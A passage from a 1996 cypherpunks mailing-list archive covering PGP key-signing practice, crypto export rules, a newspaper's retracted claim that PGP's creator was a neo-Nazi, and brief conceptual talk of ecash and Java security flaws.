>Key fingerprints should be brought on paper becuase it is not always assured
>of having a computer there to read the disk. (We had a lap top that was
>refusing to read disks effectivly.  We had to use on of the Habit's
>computers.) 

...which, of course, had been infected the night before by a black-bag job 
by some NSA operatives with a "fiddle with PGP and make the key signatures 
come out wrong" virus...  <G!>

Paranoia strikes deep...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 24 Jan 1996 13:48:34 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <199601240313.TAA02133@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Dan Weinstein wrote:

> On Tue, 23 Jan 1996 10:39:03 -0500, perry@piermont.com wrote:
> 
> 
> >Set up development shop overseas for the crypto plug-ins.
> >
> >The solution is obvious and easy.
> >
> >By the way, I really think Netscape should simply ship Jeff and other
> >people to the Amsterdam office or wherever else seems reasonable and
> >do all the crypto work from there. It will save trouble and
> >hassle. U.S. citizens wanting full 128 bit over the net would then get
> >it from Netscape's overseas download sites. No one anywhere in the
> >world would be forced to use crap.
> 
> Wrong, this would be a violation of ITAR.

David Chaum is doing it, why can't Netscape?  I agree that it's
probably technically a violation.  I think that the real thing
that's stopping Netscape is the golden government handcuffs, they
don't want to piss off a big customer.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Jan 1996 13:30:25 +0800
To: cypherpunks@toad.com
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <199601240015.SAA03590@proust.suba.com>
Message-ID: <Pine.ULT.3.91.960123190211.27450F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Alex Strasheim wrote:

> > We need to find a way to take back the initiative. We need to find a way 
> > to put the fear of God into liers.
> 
> I'm outta step here, I know, but it seems to me that if we're going to go
> around advocating anonymity and technology that makes censorship
> impossible we'd better grow thicker skins. 

(Hear)^2

> Is it a terrible thing that someone called him a name in print?  Yes.  If 
> he's got a case, he should sue.  But something tells me he's tough enough 
> to take it either way.

Geez, guys, they didn't even do that.

Some rag said that Nazis used PGP.

Some anonymous guy forwarded, without substantive comment, a report of the
above. 

The report is true, to a point. Nazis use PGP. So do child pornographers,
anti-Nazis, rapists, women who have been raped and don't care for the
world to know, major US and international corporations, and the US
Military (most of the computer security bulletins I see from .mil are
PGP-signed). 

I thought the report was totally bogus, and I took Mr. Anonymous's posting
to be a joke -- see, first those silly people who don't understand
anything are attacking the Internet because it's got these dirty pictures
on it, now they say there's Nazis using encryption on it. 

Was there nobody else who was able to look at that and laugh?

Sheesh.

> > Violence won't work, since they are capable of human-wave attacks.
> 
> And because it's wrong?

"Wrong" is irrelevant, because it's unenforceable. Right, guys? Don't be 
such a girlie, Alex.

What we need is amoral deterrence at the most atomistic level, right? 
Heck, it's the only thing that we know works.

-rich
 Fucking Statist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 24 Jan 1996 12:27:01 +0800
To: weld@l0pht.com (Weld Pond)
Subject: Re: [local] Report on Portland Cpunks meeting
In-Reply-To: <Pine.BSD/.3.91.960123143344.3181A-100000@l0pht.com>
Message-ID: <960123.192211.0u1.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, weld@l0pht.com writes:

> This begs the question, "How would you conduct an efficient key signing 
> given what you have learned?" I am in the process of organizing one and 
> would like to get input as to the best way that this should take place.  
> Should people bring key fingerprints and public keys on floppy?

Fingerprints, yes.  Floppies, perhaps not.  At the least, it means you
have to have hardware on site and someone has to work swapping floppies.

I've done a signing where we all send out keys to one person.  He
distributes a keyring to all participants. Then we meet, exchange
fingerprints in person, take the prints home and sign in private.
All the participants mail their keys back to the collector, who
returns a keyring with all keys, properly signed.  I always hand out my
Certified Computer Geek[tm] card, which has only email addresses, web
page and key fingerprints.

> How would you conduct a nym signing?

I suppose that depends on whether you want to associate a nym with a
physical person.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQWNrBvikii9febJAQE5CgQAliDvBcJze7XbW8k1EOPEZYmq69jUDPu/
6W9wqJ9m9nuNHVK1C3m+rW+F6fMQ9gvGbiMM9+ljlSSJzgS+Pj8j7hTIy3rjXsdO
G6di+s62V8hawtPLeknrT9vXRCJmAdsb7rodYjc7zmQUKLUYz+e657o/tomYICDZ
s0c6lniwpUs=
=LUpN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abarrett@ee.net
Date: Wed, 24 Jan 1996 12:08:12 +0800
To: cypherpunks@toad.com
Subject: IMC Resolving Email Security Complexity Workshop
Message-ID: <199601240024.TAA05573@mail.ee.net>
MIME-Version: 1.0
Content-Type: text/plain


Found this in the box the other day - thought it might be of interest, esp 
regarding secure email standards.

Warmest regards,
AJ

<---- Begin Forwarded Message ---->
Return-Path: dcrocker@brandenburg.com
Date: Tue, 23 Jan 1996 10:20:50 -0800
To: (potential attendees)
From: Dave Crocker <dcrocker@brandenburg.com>
Subject: IMC Resolving Email Security Complexity Workshop

This is a query of your interest in participating in a working meeting.

As an initial activity of the newly-formed Internet Mail Consortium, we are
hoping to use the coincident timing of EMail World in San Jose and the ISOC
Security Conference in San Diego to call for an all-day meeting on the
matter of email security. (If you aren't familiar with the IMC, please
check out info@imc.org or <http://www.imc.org/>.)

This note is intended as a pre-announcement and a solicitation for feedback
concerning your interest.  We'd like to get a sense of the number and range
of folks who might/can/will attend.  We do not yet have logistics or
finances fully worked out, but the timing pressure is tight enough to
warrant this letter before the official announcement.  Comments about the
activity and, especially, an indication of availability, willingness, and
(best of all) intention to attend would be highly welcome.

	Please pass this note on to others who you think are
	(or should be) interested in email security.


Specifics

As its first activity, the Internet Mail Consortium proposes to organize a
one-day workshop to consider the problem of multiple MIME-based security
mechanisms.  This is a complicated topic with a long and painful history,
but the previous pain is insignificant when compared to what is emerging
for vendors and, worse still, for users.

Our proposal is to conduct an open meeting with attendance by principals
and others involved in this area of work.  We will invite the key
contributors and solicit additional attendance by vendors, providers,
users, and technologists who are concerned with email security.

The attendance goal is to have a critical mass of those with the technical
expertise and industry involvement to review and debate the requirements,
capabilities, and possibilities.  The work goal is to seek common ground
for a common solution.

While we are not overly hopeful that the end of the day will see peace and
resolve among the masses, we do hope for a large amount of improved
understanding and some amount of convergence.  With luck, there will even
be improvement in the clarity of constituency for the different technical
choices -- that is, a strengthening of the political base for some of the
alternatives.

We would like to hold the event:

		Wednesday, 21 February
		8:30 am - 5:30 pm (all day)
		(Near) EMail World event, San Jose Convention Center, CA.

This is the last day of EMail World and the day before a two-day ISOC
Security conference in San Diego.

We propose to structure the meeting with a tight agenda, having a very
focused sequence of work on the problem; this is definitely not for general
education.  Some amount of review is appropriate, but not much.  Attendees
will be expected to be knowledgeable in the basic technologies, so that
only general systems design and specific algorithm choices need to be
cited. To help everyone prepare, the Internet Mail Consortium will organize
a set of mail-response and Web pages with references and summaries of the
current technologies, and will establish a mailing list for exchanges
leading up to the meeting.


Proposed Agenda

Morning
	Brief descriptions of the candidate solutions
	Review of the functional and technical requirements
	Review the extent to which each alternative satisfies the requirements
	Seek consensus about the requirements

Afternoon
	Haggle about the strengths and weaknesses of the technical alternatives
	Explore the choices and/or negotiate a preferred solution

Those who have worked on this topic in the IETF are quite tired of the
whole situation, but the unfortunate reality is that the current product
and user choices are quite problematic. We need to continue seeking a
viable service.

We expect to charge $50 per person, to cover basic costs.  I should
have more details about this next week.

Please do let us know your comments.  Thanks!

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                fax:  +1 408 249 6205
675 Spruce Dr.                                     dcrocker@brandenburg.com
Sunnyvale, CA  94086 USA                         http://www.brandenburg.com



<----  End Forwarded Message  ---->

__________________________________________________________________
Out the buffer,         | PGP encrypted e-mail preferred.
Through the com port,   | Finger for Public Key.
Over the POTS line,     | Also available on a key server near you.
Into the NT Box,        |
Up the fractional T1,   | Key ID: 0X457AA6BD
Onto the backbone,      | Keyprint: 99 C7 17 3B 32 08 3F 17
Nothin' but 'Net.       |           F4 A9 42 A9 2F BC 39 B1
------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@beijing.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 24 Jan 1996 12:06:35 +0800
To: cypherpunks@toad.com
Subject: Re: Why is blowfish so slow?  Other fast algorithms?
In-Reply-To: <199601221851.NAA16938@amsterdam.lcs.mit.edu>
Message-ID: <199601240032.TAA16837@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601221851.NAA16938@amsterdam.lcs.mit.edu>,
David Mazieres <dm@amsterdam.lcs.mit.edu> wrote:
> The problem with RC4 is that it works in OFB only.  If I need data
> integrity in the face of known plaintext, I will need to compute a MAC
> in paralell with the encryption which could significantly slow things
> down.

If you want authentication, you must use a crypto-strength MAC.
Encryption (be it RC4, DES, etc.) is not enough.

>        With a block cypher in CFB, I can just re-encrypt the last
> block of data.

False.  CFB has limited error propagation, so if I modify any block
before the next-to-last, it will not show up with your method.



This seems to be a really common error.
If you want message integrity guarantees, you must use a MAC.  Always.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQV+LioZzwIn1bdtAQF7pgGAm6GnmZqPSElx8mVyonD9BqScefdZLhul
fv/qU/bsEDM2YyKuBpoFWyKMwIH0jyzx
=Bp2Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 24 Jan 1996 17:34:25 +0800
To: cypherpunks@toad.com
Subject: Re: DigiCash Ecash - 2 security topics
In-Reply-To: <199601221635.RAA13080@digicash.com>
Message-ID: <4e3von$8ut@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


>> > E.g. has there been a DigiCash response to Ian Goldberg's
>> > publication of a denial-of-service attack which operates by 
>> > spending a coin with the same serial number as your victim's 
>> > coin?
>> After discussing things with Ian we came up with several solutions. 
>> One is encrypting more messages (which we will do in a next revision 
>> of the protocol), the other is enabling ecash to work over ssl 
>> servers. You may not see the answer directly in the list, but you 
>> will see it in the next protocol revision.

Actually, my original suggestion was to include 'n' in the value encrypted
in the bank's public key.  The less we have to _rely_ on ecash-enabled
apps having to do their own encryption (like SSL), the better.
Of course, extra encryption is OK, too.

I wonder if Dave and I will get Digicash's reward for this one...
I still haven't seen anything from them (though various individuals keep
promising), or from Netscape either, for that matter... [emoticon elided]

   - Ian "starving grad student (sigh)"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jan 1996 12:51:42 +0800
To: Alan Horowitz <mpd@netcom.com>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
Message-ID: <2.2.32.19960124014532.0095ac74@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:11 PM 1/23/96 -0500, Alan Horowitz wrote:
>The reporter's slander against Zimmerman was not accidental, or the 
>result of ignorance.  Calling someone a Naxi sympathizer is not something 
>that one should do without a smoking gun.
>
>This act of aggression against cypherpunks, attempts to box us into a 
>corner. Our enemies want to keep us on the defensive.  

Phil is not a cypherpunk.  

On the whole, the cypherpunks have gotten very favorable press for a group
who's actions may render government policies irrelevant and possibly the
governments themselves.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 12:09:27 +0800
To: cypherpunks@toad.com
Subject: Philip Zimmermann and the Press
Message-ID: <199601240146.UAA11319@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I contacted Phil about the neo-Nazi attribution in the British
press. He has apparently contacted the newspaper and it appears that
they are probably going to print an article retracting their
statement. I've asked him to comment here but I don't know if he will.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 12:25:32 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [local] Report on Portland Cpunks meeting
In-Reply-To: <2.2.32.19960124002635.008c27e8@mail.teleport.com>
Message-ID: <199601240203.VAA11351@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen writes:
> {key signing stuff deleted for space]
> 
> That was the basic format we used.  The only difference was that the keys
> were collected before hand and distributed on disk.

That makes it hard to have people check things off in real time. You
need to have people read their fingerprints or orally acknowledge
them, which you can't do if they aren't readable to the crowd.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 12:31:40 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <199601240125.RAA07818@netcom6.netcom.com>
Message-ID: <199601240209.VAA11363@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> At least maybe I can avoid Perry's wrath for an off topic post :-).

Just for reference, the topic of firewalls and whether cryptographic
tools render them obsolete is not off topic for cypherpunks. In fact,
its one of the rare topics that is actually totally proper here...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Garry Bentlin <Garry@zip.com.au>
Date: Tue, 23 Jan 1996 18:33:03 +0800
To: cypherpunks@toad.com
Subject: yo subscribe!!
Message-ID: <3104C565.6BDD@zip.com.au>
MIME-Version: 1.0
Content-Type: text/plain


how do I? 
and can you ?
thanks heeeps!
	reg, 
	garryb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Wed, 24 Jan 1996 23:17:13 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: "PRZ a nazi" to be retracted
Message-ID: <31064c10.idoc@idoc.idoc.ie>
MIME-Version: 1.0
Content-Type: text


The Sunday Telegraph of London printed a story last Sunday about neo-nazis
using PGP to encrypt their communications.  The story said that PGP was
devised by an American neo-nazi sympathizer.  As the creator of PGP, and
a human rights activist, I was outraged by such a defamation from a major
newspaper.  I called my lawyer Phil Dubois, who seemed to look forward to
having some fun with this newspaper.

Not wanting to wait around till the morning, and slow lawyers, I called
Robin Gedye, the reporter in Bonn who wrote the story, at 7am Monday morning
Bonn time, and woke him up at home.  I introduced myself and told him how I
felt about it.  He had never heard of me, the Clipper chip, the controversies
of cryptography, and knew nothing about PGP outside of the couple of
sentences in his story that mentioned PGP.  He said it wasn't really so bad,
because he didn't specifically identify me by name.  One can imagine the
effectiveness of that excuse with me.  I then went into some detail with him
to bring him up to speed.  I also called his editor in London, who also had
never heard of me or PGP.

After some checking, they discovered that the Daily Telegraph, a related
newspaper, had run an article about my case just a week before.  They also
found about 20 recent articles on me in the UK press.  The editor said that
my story "checks out".  It was good to know that they now believed that I
was not a neo-nazi after all.

Anyway, Mr. Gedye says that the Sunday Telegraph will print a retraction
next Sunday.  Not just a little retraction, but a whole article on the
subject, written by Mr. Gedye himself.  I'm glad to see that this probably
means that he will dig into the subject more, in order to write such an
article.

I guess this means maybe I'll find some other things to occupy Phil Dubois's
time.

  -Philip Zimmermann
   23 Jan 96





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@vishnu.alias.net (Mr. Boffo)
Date: Wed, 24 Jan 1996 13:51:16 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601240416.WAA10297@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


Speaking of the security of networks, and the entertainment value of possible hacks...

<snip>

     Uri Geller offers $1 million to spoon benders on World Wide Web

     Starting February 29, professed psychic Uri Geller will be offering $1
million to anyone who can bend a spoon on the World Wide Web.  The spoon will
be sealed in a transparent safe and shown by live video feed on his Web page
at http://www.urigeller.com.  He says he's tired of skeptics constantly asking
him to proove his mental abilities, which he can't do on command, so he's
looking for someone who -can- perform on command.  You won't be able to just
hit the page and stare at the spoon for free, though...  This golden
opportunity will cost $4.50 a glare.

</snip>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 13:42:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <m0tevYq-0008y2C@pacifier.com>
Message-ID: <199601240336.WAA11471@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jim bell writes:
> Maybe this is common knowledge, but the name "Zimmermann" and crypto had 
> another relationship, in World War I.  If anybody knows more about this 
> incident than my vague recollection of the famous "Zimmermann cipher" would 
> you care to tell the story?

It was the Zimmermann Telegram, actually, and it was a dispatch from
the Germans to the Mexicans trying to promise them most of the
southwest in exchange for being allies against the U.S. (which wasn't
yet in the war). The Brits intercepted and decoded it and released it,
which forced the U.S. into World War I.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 24 Jan 1996 13:51:19 +0800
To: cypherpunks@toad.com
Subject: Journalistic Questions: Re PZ. [NOISE]
Message-ID: <199601240344.WAA00407@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 24, 1996 02:02:41, 'djw@vplus.com (Dan Weinstein)' wrote in response
to a series of questions I asked of Anonymous User over PZ:: 
 
 
> 
>Phil Zimmerman doesn't owe anyone an explaination of his politics. 
> 
 
There are many times and areas where people may "owe" an explanation of
their politics. I strongly suspect, however, that the issue raised by the
German (?) journalist was not likely one of them nor was the original query
by AU. 
 
I was not bothered my AU's desire for accurate information on PZ's
politics. I was bothered my my inference of how AU was going about getting
that information, particulaly given the prejudicial aspects of asking
questions on the topic to the entire cypherpunks list. I did not want to
assume that my inferences of AU's behavior were automatically accurate.
Thus, I posed the questions to AU directly. 
 
Could I have posted the questions to AU in a private message. Yup. Do I
think this would normally have been the proper method? Yup. But I decided
to follow AU's method, particularly since my questions to AU were less
damaging of his reputation than his questions to PZ. In other words, since
AU decided to ask public questions, so would I. 
 
Let me illustrate another way of getting answers to questions where the
issues behind the questions are important but the very questions asked can
be prejudicial. 
 
I was working on a story that involved how the U.S. press treated political
forces behind the large anti-war demonstrations during the Vietnam War.
Part of the reason for the story involved the heavy red-baiting in the
press during the Korean War and immediately after it. The Vietnam War
seemed to be treated in the almost opposite fashion by most of the press.
That is, that real involvement by certain left groups was kept out of the
press. (I ignore here the claims by ignorant rightwing forces with much to
be ignorant about who routinely pronouced "Hanoi Jane" Fonda as *the*
communist antiwar leader.) 
 
My researches indicated that the Socialist Workers Party and the Communist
Party USA played a far greater role in the large national marches than the
daily media credited (or, if you wish, damned) them for. 
 
My researches further led me to conclude that Fred Halstead headed the SWP
anti-war effort and Gil Green headed a similar effort for the CPUSA. 
 
I confirmed the SWP and Halstead, and I confirmed the CPUSA. But I had not
confirmed Gil Green. 
 
How to proceed? 
 
One way was the way that Anonymous User seemed to adopt. I just ask a large
number of different people if Green did. 
 
I was uncomfortable with that method. 
 
First, even suggesting that somebody is a member of the CPUSA tends to
injure their reputation if they are not members. 
 
Second, the people I asked may not have known shit about whether Green was,
or was, not the leader. 
 
So, I did some more research, got Green's home phone number and gave him a
call. 
 
At this point, Green did not owe me shit. He could have easily told me to
"fuck off!" 
 
I told him who I was, what I was researching, why I was researching the
story, and provided enough information for Green to know how I got his home
phone number. 
 
He asked me a few questions that permitted him to get some confirmation of
the material about me I had just spoken about. 
 
Did I owe Green answers to his questions? Under contract law, no. But I
think at some point along the line I had at least *some* obligation
ethically to answer his questions. 
 
In any case, I answered his few questions sufficiently for him to invite me
over to his apartment and I got the information I wanted in the course of
about a two-hour interview. 
 
That I think was a responsible way of getting the answer to my question. It
was responsible to my editor, responsible to my readers, and responsible to
my (potential) source. 
 
I do not think it likely that AU behaved in an equally responsible manner. 
 
But neither had anything to do with what PZ did, or did not, "owe" people. 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 24 Jan 1996 13:45:31 +0800
To: cypherpunks@toad.com
Subject: Re: Philip Zimmermann and the Press
Message-ID: <199601240345.WAA00570@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Immediately after posting my message on press queries re AU and PZ, Perry
Metzger's post hit. 
 
On Jan 23, 1996 20:46:37, '"Perry E. Metzger" <perry@piermont.com>' wrote: 
 
 
> 
>I contacted Phil about the neo-Nazi attribution in the British 
>press. He has apparently contacted the newspaper and it appears that 
>they are probably going to print an article retracting their 
>statement. I've asked him to comment here but I don't know if he will. 
> 
>Perry 
> 
 
I wrote in the previous post that I do not think that AU adopted a
responsible method of getting answers to his questions. I think that Perry
did. 
 
Of course the question by both people was (in a limited sense) the same. So
was the importance of the question. 
 
But the method that Perry adopted was much more responsible. I suspect it
is also more likely to elicit an answer to the question. 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Wed, 24 Jan 1996 07:41:38 +0800
To: gback@facility.cs.utah.edu
Subject: Re: Hack Java
In-Reply-To: <199601231756.KAA03101@sal.cs.utah.edu>
Message-ID: <Pine.3.89.9601232225.B4292-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996 gback@facility.cs.utah.edu wrote:

[much elided stuff]

> > Now suppose, I fake a compiler (or I have a malicious compiler)
> > and I generate by hand malicious byte code such that
> > in the symbol tables, tricky_pointer and data have the same
> > offset.
> > 
> 

[more stuff taken out]

Godmar Said:

> 
> To my knowledge, the Java, and Java bytecode does not imply
> any memory layout. I doubt it makes sense to demand to check
> that 'offset do not overlap in memory'.
> 

Both of you are correct if you look carefully at the assumptions.  Rich 
assumes that you have a 'malicious compiler'.  Godmar is right that Java 
does not utilize pointers in the byte code.  What would make the entire 
scenario work is a malicious interpreter or a 'NotJava Browser'(TM) that 
allowed malicious code to be executed.  Couple a bad compiler and a bad 
interpreter and you are in buisness (nasty business that is).

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 24 Jan 1996 15:54:03 +0800
To: cypherpunks@toad.com
Subject: Who would sign Lucky Green's key?
Message-ID: <v02120d57ad2b890610eb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


The latest discussion about key signing parties and related questions asked
in private email got me thinking about signing keys for nyms. What would
one have to know to sign a key for a nym? Would you sign my key? Why?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 24 Jan 1996 15:48:42 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d58ad2b8c17c952@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:13 1/23/96, Thaddeus J. Beier wrote:

>David Chaum is doing it, why can't Netscape?  I agree that it's
>probably technically a violation.  I think that the real thing
>that's stopping Netscape is the golden government handcuffs, they
>don't want to piss off a big customer.

The people working on crypto for Chaum aren't US citizens.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Jan 1996 16:02:14 +0800
To: perry@piermont.com
Subject: Re: IPSEC == end of firewalls
Message-ID: <199601240726.XAA16476@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Bill Frantz writes:
>> At least maybe I can avoid Perry's wrath for an off topic post :-).
>
>Just for reference, the topic of firewalls and whether cryptographic
>tools render them obsolete is not off topic for cypherpunks. In fact,
>its one of the rare topics that is actually totally proper here...

Expressed that way, I must agree.  However, I think we also agree that
firewalls in general should be elsewhere.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jan 1996 16:10:33 +0800
To: cypherpunks@toad.com
Subject: Re: An IDEA whose time has come (Notes from the RSA Conference)
Message-ID: <199601240749.XAA22962@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 1/22/96 -0800, Jonathan Zamick <JonathanZ@consensus.com> wrote:
> Right now I'm trying to convince Ascom to develop a
> crippled version of IDEA to simply give away if anyone wants it for export.
> (Like most of the folk here, I don't see a 40 bit key as very valuable, but
> it is useful for companies which don't have contacts in Europe.)

A crippled version is easy - generate a 128-bit random key, make 88 bits
available as salt, leaving 40 hidden bits.  The problem is how to make the
salt-bits available without interfering with applications and protocols.
If you wanted a 64-bit crippled version, most applications need 64 bits
of IV anyway, so you could use 64 bits of salt for that, leaving 64 more.
To do a 40-bit version, you _could_ use 64 bits of salt and wire down the
other 24 bits into a well-known pattern instead of choosing them randomly.
That's three characters of ASCII, and I'd suggest "NSA" as the obvious
pattern :-)

So generate your 128-bit random number, replace the first 24 bits with "NSA",
copy the 64 bits into the IV, and use it for your key.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jan 1996 16:16:39 +0800
To: jpb@miamisci.org (Joe Block)
Subject: Re: Crippled Notes export encryption
Message-ID: <199601240750.XAA23177@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:53 PM 1/23/96 -0500, jpb@miamisci.org (Joe Block) wrote:
>At 9:06 AM 1/23/96, Herb wrote:
>>Careful... what would YOU have done, with your customers demanding stronger
>>crypto today and you unable to legally give it to them?
>
>Umm - contract the crypto overseas somewhere it would be legal to export it
>from?  Then import the code to the USA, with a press release to WSJ & NYT
>stating that American programmers were being put out of work by ITAR.

The problem is whether you can separate the functionality of what you're
exporting sufficiently from what you're contracting out that the exported
material isn't a "component of a cryptosystem"; it's tough to do a good bones
version of code if you're concerned about satisfying both the letter and
spirit of a law to avoid hassles with the government.  On the other hand,
if you're as big as IBM or even MIT, sometimes you can do it....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 24 Jan 1996 16:43:17 +0800
To: jim bell <cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <2.2.32.19960124080823.008ccf80@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:11 PM 1/23/96 -0800, jim bell wrote:
>At 04:26 PM 1/23/96 -0800, Alan Olsen wrote:

>>Key fingerprints should be brought on paper becuase it is not always assured
>>of having a computer there to read the disk. (We had a lap top that was
>>refusing to read disks effectivly.  We had to use on of the Habit's
>>computers.) 
>
>...which, of course, had been infected the night before by a black-bag job 
>by some NSA operatives with a "fiddle with PGP and make the key signatures 
>come out wrong" virus...  <G!>

Well, it was only YOUR key that we were verifying!

>Paranoia strikes deep...

Into your keyring it creeps... It starts when your always afraid... Step out
of line and the orbital mindcontrol lasers will zap you away...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 24 Jan 1996 16:26:14 +0800
To: cypherpunks@toad.com
Subject: Re: Who would sign Lucky Green's key?
Message-ID: <2.2.32.19960124081315.008c4a88@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 PM 1/23/96 -0800, Lucky Green wrote:
>The latest discussion about key signing parties and related questions asked
>in private email got me thinking about signing keys for nyms. What would
>one have to know to sign a key for a nym? Would you sign my key? Why?

There are nym keys i have signed before.  They are usually for nyms of
